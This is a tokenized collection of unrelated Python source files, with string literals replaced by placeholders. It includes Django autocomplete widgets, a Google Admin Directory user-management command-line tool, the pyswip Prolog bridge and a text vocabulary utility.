<EOL> user <EOL> if message : <EOL> line = u'<STR_LIT>' . format ( name ( channel ) , message ) <EOL> self . irc_client . send_line ( line ) <EOL> else : <EOL> line = u'<STR_LIT>' . format ( self . config [ '<STR_LIT>' ] . get ( '<STR_LIT>' , '<STR_LIT>' ) , unicode ( data ) ) <EOL> self . irc_client . send_line ( line ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> from util import main_loop <EOL> config = load_config ( '<STR_LIT>' ) <EOL> debug = config [ "<STR_LIT>" ] <EOL> host = config [ '<STR_LIT>' ] [ '<STR_LIT:host>' ] <EOL> port = config [ '<STR_LIT>' ] . get ( '<STR_LIT:port>' , <NUM_LIT> ) <EOL> bot = IrcBot ( host , port , config = config ) <EOL> site_plugins = [ ] <EOL> files_currently_downloading = [ ] <EOL> job_hash = { } <EOL> if config . get ( '<STR_LIT>' , None ) : <EOL> import daemon <EOL> with daemon . DaemonContext ( ) : <EOL> main_loop ( bot , config ) <EOL> main_loop ( bot , config ) </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> from django import VERSION <EOL> from django import forms <EOL> from django . core . urlresolvers import reverse <EOL> from django . utils import six <EOL> class WidgetMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , url = None , forward = None , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . url = url <EOL> self . forward = forward or [ ] <EOL> super ( WidgetMixin , self ) . __init__ ( * args , ** kwargs ) <EOL> def build_attrs ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> attrs = super ( WidgetMixin , self ) . build_attrs ( * args , ** kwargs ) <EOL> if self . url is not None : <EOL> attrs [ '<STR_LIT>' ] = self . url <EOL> autocomplete_function = getattr ( self , '<STR_LIT>' , None ) <EOL> if autocomplete_function : <EOL> attrs . setdefault ( '<STR_LIT>' , <EOL> autocomplete_function ) <EOL> if self . forward : <EOL> attrs . setdefault ( '<STR_LIT>' , <EOL> '<STR_LIT:U+002C>' . join ( self . forward ) ) <EOL> return attrs <EOL> def filter_choices_to_render ( self , selected_choices ) : <EOL> """<STR_LIT>""" <EOL> self . choices = [ c for c in self . choices if <EOL> six . text_type ( c [ <NUM_LIT:0> ] ) in selected_choices ] <EOL> def render_options ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> selected_choices_arg = <NUM_LIT:1> if VERSION < ( <NUM_LIT:1> , <NUM_LIT:10> ) else <NUM_LIT:0> <EOL> selected_choices = [ c for c in args [ selected_choices_arg ] if c ] <EOL> if self . url : <EOL> all_choices = copy . copy ( self . choices ) <EOL> self . filter_choices_to_render ( selected_choices ) <EOL> html = super ( WidgetMixin , self ) . render_options ( * args ) <EOL> if self . url : <EOL> self . choices = all_choices <EOL> return html <EOL> def _get_url ( self ) : <EOL> if self . _url is None : <EOL> return None <EOL> if '<STR_LIT:/>' in self . _url : <EOL> return self . _url <EOL> return reverse ( self . _url ) <EOL> def _set_url ( self , url ) : <EOL> self . _url = url <EOL> url = property ( _get_url , _set_url ) <EOL> class Select ( WidgetMixin , forms . Select ) : <EOL> """<STR_LIT>""" <EOL> class SelectMultiple ( WidgetMixin , forms . SelectMultiple ) : <EOL> """<STR_LIT>""" <EOL> class QuerySetSelectMixin ( WidgetMixin ) : <EOL> """<STR_LIT>""" <EOL> def filter_choices_to_render ( self , selected_choices ) : <EOL> """<STR_LIT>""" <EOL> self . choices . queryset = self . choices . queryset . filter ( <EOL> pk__in = [ c for c in selected_choices if c ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from dal_select2 . widgets import TagSelect2 <EOL> from django import VERSION <EOL> from django . utils import six <EOL> class TaggitSelect2 ( TagSelect2 ) : <EOL> """<STR_LIT>""" <EOL> def render_options ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> selected_choices_arg = <NUM_LIT:1> if VERSION < ( <NUM_LIT:1> , <NUM_LIT:10> ) else <NUM_LIT:0> <EOL> selected_choices = args [ selected_choices_arg ] <EOL> if isinstance ( selected_choices , six . text_type ) : <EOL> choices = [ c . strip ( ) for c in selected_choices . split ( '<STR_LIT:U+002C>' ) ] <EOL> else : <EOL> choices = [ c . tag . name for c in selected_choices if c ] <EOL> options = [ <EOL> '<STR_LIT>' % ( <EOL> c , c ) for c in choices <EOL> ] <EOL> return '<STR_LIT:\n>' . join ( options ) </s>
<s> from django . contrib . contenttypes . fields import GenericForeignKey <EOL> from django . db import models <EOL> from django . utils . encoding import python_2_unicode_compatible <EOL> @ python_2_unicode_compatible <EOL> class TestModel ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:200> ) <EOL> content_type = models . ForeignKey ( <EOL> '<STR_LIT>' , <EOL> null = True , <EOL> blank = True , <EOL> editable = False , <EOL> ) <EOL> object_id = models . PositiveIntegerField ( <EOL> null = True , <EOL> blank = True , <EOL> editable = False , <EOL> ) <EOL> test = GenericForeignKey ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for_inline = models . ForeignKey ( <EOL> '<STR_LIT>' , <EOL> null = True , <EOL> blank = True , <EOL> related_name = '<STR_LIT>' <EOL> ) <EOL> def __str__ ( self ) : <EOL> return self . name </s>
<s> default_app_config = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> from django . core . wsgi import get_wsgi_application <EOL> sys . path . insert ( <EOL> <NUM_LIT:0> , <EOL> os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) ) ) <EOL> ) <EOL> os . environ . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> application = get_wsgi_application ( ) </s>
<s> def test_it ( binbb , repos_cfg ) : <EOL> """<STR_LIT>""" <EOL> expected_words = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . split ( ) <EOL> for account_name , rep_cfg in repos_cfg . items ( ) : <EOL> for repo_name in rep_cfg . keys ( ) : <EOL> bbcmd = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , account_name , "<STR_LIT>" , repo_name ] <EOL> res = binbb . sysexec ( * bbcmd ) <EOL> for word in expected_words : <EOL> assert word in res <EOL> lines = res . strip ( ) . splitlines ( ) <EOL> assert len ( lines ) >= <NUM_LIT:8> <EOL> return </s>
<s> import os <EOL> import sys <EOL> import codecs <EOL> import pprint <EOL> from apiclient . discovery import build <EOL> import httplib2 <EOL> from oauth2client . client import flow_from_clientsecrets <EOL> from oauth2client . file import Storage <EOL> from oauth2client import tools <EOL> import argparse <EOL> import simplejson as json <EOL> from const import * <EOL> from utils import * <EOL> def show_active_resource ( resource ) : <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % ( resource [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] , resource [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] ) <EOL> if resource . has_key ( '<STR_LIT>' ) : <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> if resource . has_key ( '<STR_LIT>' ) : <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> for email in resource [ '<STR_LIT>' ] : <EOL> if email . has_key ( '<STR_LIT>' ) : <EOL> print "<STR_LIT>" % email [ '<STR_LIT:address>' ] <EOL> else : <EOL> print "<STR_LIT>" % email [ '<STR_LIT:address>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> if resource . has_key ( '<STR_LIT>' ) : <EOL> for email in resource [ '<STR_LIT>' ] : <EOL> print "<STR_LIT>" % email <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> def show_deleted_resource ( resource ) : <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> def show_resource ( resource ) : <EOL> if resource . has_key ( '<STR_LIT>' ) : <EOL> show_deleted_resource ( resource ) <EOL> else : <EOL> show_active_resource ( resource ) <EOL> def show_resource_list ( resources , verbose ) : <EOL> for resource in resources : <EOL> if verbose : <EOL> show_resource ( resource ) <EOL> print "<STR_LIT>" <EOL> else : <EOL> if resource . has_key ( '<STR_LIT>' ) : <EOL> print "<STR_LIT>" % ( resource [ '<STR_LIT>' ] , resource [ '<STR_LIT>' ] ) <EOL> else : <EOL> print "<STR_LIT>" % ( resource [ '<STR_LIT>' ] , <EOL> resource [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] , <EOL> resource [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] ) <EOL> def list_user ( sv , args ) : <EOL> users = [ ] <EOL> pageToken = None <EOL> while True : <EOL> params = { } <EOL> if args . domain : <EOL> params [ '<STR_LIT>' ] = args . domain <EOL> if args . customer : <EOL> params [ '<STR_LIT>' ] = args . customer <EOL> if args . reverse : <EOL> params [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if args . showDeleted : <EOL> params [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> if args . orderBy : <EOL> params [ '<STR_LIT>' ] = args . orderBy <EOL> if args . query : <EOL> params [ '<STR_LIT>' ] = args . query . decode ( '<STR_LIT:utf-8>' ) <EOL> if args . maxResults : <EOL> params [ '<STR_LIT>' ] = args . maxResults <EOL> if pageToken : <EOL> params [ '<STR_LIT>' ] = pageToken <EOL> if not params . has_key ( '<STR_LIT>' ) and not params . has_key ( '<STR_LIT>' ) : <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> r = sv . list ( ** params ) . execute ( ) <EOL> if r . has_key ( '<STR_LIT>' ) : <EOL> if args . jsonPretty or args . json : <EOL> for user in r [ '<STR_LIT>' ] : <EOL> users . append ( user ) <EOL> else : <EOL> show_resource_list ( r [ '<STR_LIT>' ] , args . verbose ) <EOL> if r . has_key ( '<STR_LIT>' ) : <EOL> pageToken = r [ '<STR_LIT>' ] <EOL> else : <EOL> break <EOL> if args . jsonPretty : <EOL> if len ( users ) == <NUM_LIT:1> : <EOL> print to_pretty_json ( users [ <NUM_LIT:0> ] ) <EOL> else : <EOL> print to_pretty_json ( users ) <EOL> elif args . json : <EOL> if len ( users ) == <NUM_LIT:1> : <EOL> print to_json ( users [ <NUM_LIT:0> ] ) <EOL> else : <EOL> print to_json ( users ) <EOL> def get_user ( sv , args ) : <EOL> r = sv . get ( userKey = args . userKey ) . execute ( ) <EOL> if args . jsonPretty : <EOL> print to_pretty_json ( r ) <EOL> elif args . json : <EOL> print to_json ( r ) <EOL> else : <EOL> show_resource ( r ) <EOL> def insert_user ( sv , args ) : <EOL> body = { '<STR_LIT:name>' : { '<STR_LIT>' : args . familyName . decode ( '<STR_LIT:utf-8>' ) , <EOL> '<STR_LIT>' : args . givenName . decode ( '<STR_LIT:utf-8>' ) } , <EOL> '<STR_LIT:password>' : args . password , <EOL> '<STR_LIT>' : args . primaryEmail } <EOL> if args . changePasswordAtNextLogin : <EOL> body [ '<STR_LIT>' ] = True if args . changePasswordAtNextLogin == '<STR_LIT:true>' else False <EOL> if args . suspended : <EOL> body [ '<STR_LIT>' ] = True if args . suspended == '<STR_LIT:true>' else False <EOL> if args . orgUnitPath : <EOL> body [ '<STR_LIT>' ] = args . orgUnitPath . decode ( '<STR_LIT:utf-8>' ) <EOL> r = sv . insert ( body = body ) . execute ( ) <EOL> if args . verbose : <EOL> if args . jsonPretty : <EOL> print to_pretty_json ( r ) <EOL> elif args . json : <EOL> print to_json ( r ) <EOL> else : <EOL> show_resource ( r ) <EOL> def patch_user ( sv , args ) : <EOL> body = { } <EOL> if args . familyName or args . givenName : <EOL> body [ '<STR_LIT:name>' ] = { } <EOL> if args . familyName : <EOL> body [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] = args . familyName . decode ( '<STR_LIT:utf-8>' ) <EOL> if args . givenName : <EOL> body [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] = args . givenName . decode ( '<STR_LIT:utf-8>' ) <EOL> if args . orgUnitPath : <EOL> body [ '<STR_LIT>' ] = args . orgUnitPath . decode ( '<STR_LIT:utf-8>' ) <EOL> if args . suspended : <EOL> body [ '<STR_LIT>' ] = True if args . suspended == '<STR_LIT:true>' else False <EOL> if args . changePasswordAtNextLogin : <EOL> body [ '<STR_LIT>' ] = True if args . changePasswordAtNextLogin == '<STR_LIT:true>' else False <EOL> if args . password : <EOL> body [ '<STR_LIT:password>' ] = args . password <EOL> if args . primaryEmail : <EOL> body [ '<STR_LIT>' ] = args . primaryEmail <EOL> if len ( body ) : <EOL> r = sv . patch ( userKey = args . userKey , body = body ) . execute ( ) <EOL> if args . verbose : <EOL> if args . jsonPretty : <EOL> print to_pretty_json ( r ) <EOL> elif args . json : <EOL> print to_json ( r ) <EOL> else : <EOL> show_resource ( r ) <EOL> else : <EOL> print '<STR_LIT>' <EOL> def delete_user ( sv , args ) : <EOL> r = sv . delete ( userKey = args . userKey ) . execute ( ) <EOL> def undelete_user ( sv , args ) : <EOL> body = { '<STR_LIT>' : args . orgUnitPath . decode ( '<STR_LIT:utf-8>' ) } <EOL> r = sv . undelete ( userKey = args . userKey , body = body ) . execute ( ) <EOL> def setadmin_user ( sv , args ) : <EOL> r = sv . makeAdmin ( userKey = args . userKey , body = { '<STR_LIT:status>' : True } ) . execute ( ) <EOL> def unsetadmin_user ( sv , args ) : <EOL> r = sv . makeAdmin ( userKey = args . userKey , body = { '<STR_LIT:status>' : False } ) . execute ( ) <EOL> def bulk_insert_user ( sv , args ) : <EOL> f = open ( args . jsonfile , '<STR_LIT:r>' ) <EOL> users = json . load ( f , '<STR_LIT:utf-8>' ) <EOL> for user in users : <EOL> r = sv . insert ( body = user ) . execute ( ) <EOL> if args . verbose : <EOL> if args . jsonPretty : <EOL> print to_pretty_json ( r ) <EOL> elif args . json : <EOL> print to_json ( r ) <EOL> else : <EOL> show_resource ( r ) <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( parents = [ tools . argparser ] ) <EOL> subparsers = parser . add_subparsers ( help = '<STR_LIT>' ) <EOL> parser_list = subparsers . add_parser ( '<STR_LIT:list>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT:-c>' , '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , choices = [ '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> default = '<STR_LIT:email>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , type = int , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_list . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_list . set_defaults ( func = list_user ) <EOL> parser_get = subparsers . add_parser ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_get . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_get . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_get . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_get . set_defaults ( func = get_user ) <EOL> parser_insert = subparsers . add_parser ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT:password>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_insert . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_insert . set_defaults ( func = insert_user ) <EOL> parser_patch = subparsers . add_parser ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , choices = [ '<STR_LIT:true>' , '<STR_LIT:false>' ] , <EOL> help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , choices = [ '<STR_LIT:true>' , '<STR_LIT:false>' ] , <EOL> help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_patch . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_patch . set_defaults ( func = patch_user ) <EOL> parser_delete = subparsers . add_parser ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_delete . add_argument ( '<STR_LIT>' ) <EOL> parser_delete . set_defaults ( func = delete_user ) <EOL> parser_setadmin = subparsers . add_parser ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_setadmin . add_argument ( '<STR_LIT>' ) <EOL> parser_setadmin . set_defaults ( func = setadmin_user ) <EOL> parser_unsetadmin = subparsers . add_parser ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_unsetadmin . add_argument ( '<STR_LIT>' ) <EOL> parser_unsetadmin . set_defaults ( func = unsetadmin_user ) <EOL> parser_bi = subparsers . add_parser ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser_bi . add_argument ( '<STR_LIT>' ) <EOL> parser_bi . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_bi . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_bi . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> parser_bi . set_defaults ( func = bulk_insert_user ) <EOL> args = parser . parse_args ( ) <EOL> FLOW = flow_from_clientsecrets ( CLIENT_SECRETS , <EOL> scope = SCOPES , <EOL> message = MISSING_CLIENT_SECRETS_MESSAGE ) <EOL> storage = Storage ( CREDENTIALS_PATH ) <EOL> credentials = storage . get ( ) <EOL> if credentials is None or credentials . invalid : <EOL> print '<STR_LIT>' <EOL> credentials = tools . run_flow ( FLOW , storage , args ) <EOL> http = httplib2 . Http ( ) <EOL> http = credentials . authorize ( http ) <EOL> service = build ( '<STR_LIT>' , '<STR_LIT>' , http = http ) <EOL> sv = service . users ( ) <EOL> args . func ( sv , args ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . stdout = codecs . getwriter ( '<STR_LIT>' ) ( sys . stdout ) <EOL> main ( ) </s>
<s> import sys <EOL> from pyswip . core import * <EOL> class PrologError ( Exception ) : <EOL> pass <EOL> class NestedQueryError ( PrologError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def _initialize ( ) : <EOL> args = [ ] <EOL> args . append ( "<STR_LIT>" ) <EOL> args . append ( "<STR_LIT>" ) <EOL> args . append ( "<STR_LIT>" ) <EOL> if SWI_HOME_DIR is not None : <EOL> args . append ( "<STR_LIT>" % SWI_HOME_DIR ) <EOL> result = PL_initialise ( len ( args ) , args ) <EOL> if not result : <EOL> raise PrologError ( "<STR_LIT>" <EOL> "<STR_LIT>" % result ) <EOL> swipl_fid = PL_open_foreign_frame ( ) <EOL> swipl_load = PL_new_term_ref ( ) <EOL> PL_chars_to_term ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , swipl_load ) <EOL> PL_call ( swipl_load , None ) <EOL> PL_discard_foreign_frame ( swipl_fid ) <EOL> _initialize ( ) <EOL> from pyswip . easy import getTerm <EOL> class Prolog : <EOL> """<STR_LIT>""" <EOL> _queryIsOpen = False <EOL> class _QueryWrapper ( object ) : <EOL> def __init__ ( self ) : <EOL> if Prolog . _queryIsOpen : <EOL> raise NestedQueryError ( "<STR_LIT>" ) <EOL> def __call__ ( self , query , maxresult , catcherrors , normalize ) : <EOL> swipl_fid = PL_open_foreign_frame ( ) <EOL> swipl_head = PL_new_term_ref ( ) <EOL> swipl_args = PL_new_term_refs ( <NUM_LIT:2> ) <EOL> swipl_goalCharList = swipl_args <EOL> swipl_bindingList = swipl_args + <NUM_LIT:1> <EOL> PL_put_list_chars ( swipl_goalCharList , query ) <EOL> swipl_predicate = PL_predicate ( "<STR_LIT>" , <NUM_LIT:2> , None ) <EOL> plq = catcherrors and ( PL_Q_NODEBUG | PL_Q_CATCH_EXCEPTION ) or PL_Q_NORMAL <EOL> swipl_qid = PL_open_query ( None , plq , swipl_predicate , swipl_args ) <EOL> Prolog . _queryIsOpen = True <EOL> try : <EOL> while maxresult and PL_next_solution ( swipl_qid ) : <EOL> maxresult -= <NUM_LIT:1> <EOL> bindings = [ ] <EOL> swipl_list = PL_copy_term_ref ( swipl_bindingList ) <EOL> t = getTerm ( swipl_list ) <EOL> if normalize : <EOL> try : <EOL> v = t . value <EOL> except AttributeError : <EOL> v = { } <EOL> for r in [ x . value for x in t ] : <EOL> v . update ( r ) <EOL> yield v <EOL> else : <EOL> yield t <EOL> if PL_exception ( swipl_qid ) : <EOL> term = getTerm ( PL_exception ( swipl_qid ) ) <EOL> raise PrologError ( "<STR_LIT>" . join ( [ "<STR_LIT>" , query , "<STR_LIT>" , <EOL> "<STR_LIT>" , str ( term ) , "<STR_LIT>" ] ) ) <EOL> finally : <EOL> PL_cut_query ( swipl_qid ) <EOL> PL_discard_foreign_frame ( swipl_fid ) <EOL> Prolog . _queryIsOpen = False <EOL> def asserta ( cls , assertion , catcherrors = False ) : <EOL> next ( cls . query ( assertion . join ( [ "<STR_LIT>" , "<STR_LIT>" ] ) , catcherrors = catcherrors ) ) <EOL> asserta = classmethod ( asserta ) <EOL> def assertz ( cls , assertion , catcherrors = False ) : <EOL> next ( cls . query ( assertion . join ( [ "<STR_LIT>" , "<STR_LIT>" ] ) , catcherrors = catcherrors ) ) <EOL> assertz = classmethod ( assertz ) <EOL> def dynamic ( cls , term , catcherrors = False ) : <EOL> next ( cls . query ( term . join ( [ "<STR_LIT>" , "<STR_LIT>" ] ) , catcherrors = catcherrors ) ) <EOL> dynamic = classmethod ( dynamic ) <EOL> def retract ( cls , term , catcherrors = False ) : <EOL> next ( cls . query ( term . join ( [ "<STR_LIT>" , "<STR_LIT>" ] ) , catcherrors = catcherrors ) ) <EOL> retract = classmethod ( retract ) <EOL> def retractall ( cls , term , catcherrors = False ) : <EOL> next ( cls . query ( term . join ( [ "<STR_LIT>" , "<STR_LIT>" ] ) , catcherrors = catcherrors ) ) <EOL> retractall = classmethod ( retractall ) <EOL> def consult ( cls , filename , catcherrors = False ) : <EOL> next ( cls . query ( filename . join ( [ "<STR_LIT>" , "<STR_LIT>" ] ) , catcherrors = catcherrors ) ) <EOL> consult = classmethod ( consult ) <EOL> def query ( cls , query , maxresult = - <NUM_LIT:1> , catcherrors = True , normalize = True ) : <EOL> """<STR_LIT>""" <EOL> return cls . _QueryWrapper ( ) ( query , maxresult , catcherrors , normalize ) <EOL> query = classmethod ( query ) <EOL> def _test ( ) : <EOL> lines = [ ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ] <EOL> prolog = Prolog ( ) <EOL> for code , comment in lines : <EOL> print ( "<STR_LIT>" , code , "<STR_LIT:[>" , comment , "<STR_LIT:]>" ) <EOL> print ( list ( prolog . query ( code ) ) ) <EOL> for r in prolog . query ( "<STR_LIT>" ) : <EOL> print ( r [ "<STR_LIT:X>" ] , "<STR_LIT>" , r [ "<STR_LIT:Y>" ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> _test ( ) </s>
<s> from django . conf . urls import patterns , url <EOL> from siteuser . users import views <EOL> from siteuser . settings import USING_SOCIAL_LOGIN <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , views . SiteUserLoginView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . SiteUserRegisterView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . SiteUserResetPwStepOneView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . SiteUserResetPwStepOneDoneView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . SiteUserResetPwStepTwoDoneView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . SiteUserResetPwStepTwoView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . SiteUserChangePwView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . SiteUserChangePwDoneView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . logout , name = '<STR_LIT>' ) , <EOL> ) <EOL> if USING_SOCIAL_LOGIN : <EOL> urlpatterns += patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , views . social_login_callback ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> import re <EOL> import codecs <EOL> class VocabConstants ( ) : <EOL> """<STR_LIT>""" <EOL> UNK = "<STR_LIT>" <EOL> SOS = "<STR_LIT>" <EOL> EOS = "<STR_LIT>" <EOL> UNK_INDEX = <NUM_LIT:0> <EOL> SOS_INDEX = <NUM_LIT:1> <EOL> EOS_INDEX = <NUM_LIT:2> <EOL> def load_text ( in_file ) : <EOL> """<STR_LIT>""" <EOL> f = codecs . open ( in_file , '<STR_LIT:r>' , '<STR_LIT:utf-8>' ) <EOL> lines = [ ] <EOL> for line in f : <EOL> lines . append ( line . strip ( ) ) <EOL> f . close ( ) <EOL> return lines <EOL> def get_vocab ( corpus_file , vocab_file , freq , vocab_size ) : <EOL> """<STR_LIT>""" <EOL> if os . path . isfile ( vocab_file ) : <EOL> ( vocab_map , vocab_size ) = load_vocab ( vocab_file ) <EOL> else : <EOL> ( words , vocab_map , freq_map , vocab_size , num_train_words , <EOL> num_lines ) = load_vocab_from_corpus ( corpus_file , freq , vocab_size ) <EOL> write_vocab ( vocab_file , words ) <EOL> return ( vocab_map , vocab_size ) <EOL> def get_mapped_sentence ( corpus_file , vocab_map , sentence_map_file ) : <EOL> """<STR_LIT>""" <EOL> if os . path . isfile ( sentence_map_file ) : <EOL> sentences = load_mapped_sentence ( sentence_map_file ) <EOL> else : <EOL> sentences = [ ] <EOL> lines = load_text ( corpus_file ) <EOL> for line in lines : <EOL> tokens = line . strip ( ) . split ( ) <EOL> mapping = to_id_int ( tokens , vocab_map , <NUM_LIT:0> ) <EOL> sentences . append ( mapping ) <EOL> write_mapped_sentence ( sentences , sentence_map_file ) <EOL> return sentences <EOL> def write_mapped_sentence ( sentences , sentence_map_file ) : <EOL> f = open ( sentence_map_file , '<STR_LIT:w>' ) <EOL> for sentence in sentences : <EOL> sentence = [ str ( x ) for x in sentence ] <EOL> f . write ( '<STR_LIT:U+0020>' . join ( sentence ) + '<STR_LIT:\n>' ) <EOL> return <EOL> def load_mapped_sentence ( sentence_map_file ) : <EOL> sentences = [ ] <EOL> lines = load_text ( sentence_map_file ) <EOL> for line in lines : <EOL> ids = line . strip ( ) . split ( ) 